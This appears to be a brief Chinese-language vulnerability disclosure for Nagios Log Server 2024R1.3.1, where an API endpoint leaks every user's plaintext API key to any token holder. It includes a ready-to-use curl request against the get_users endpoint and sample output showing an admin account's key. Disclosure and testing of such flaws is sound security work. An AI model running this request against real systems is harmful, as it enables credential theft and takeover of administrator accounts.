CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H仅限研究和授权测试。 请勿在未经许可的系统上使用。
Nagios Log Server 2024R1.3.1 中存在一个 API 级别的漏洞,允许任何拥有有效 API 令牌的用户检索完整的用户账户列表及其明文 API 密钥,包括管理员凭据。此缺陷使得攻击者能够通过未授权使用暴露的令牌进行用户枚举、权限提升,并最终完全控制系统。
curl -X GET "http://<target-ip>/nagioslogserver/index.php/api/system/get_users?token=<valid_token>"
[
{
"name": "devadmin",
"username": "devadmin",
"email": "[email protected]",
"apikey": "dcaa1693a79d651ebc29d45c879b3fbbc730d2de",
"auth_type": "admin",
...
}
]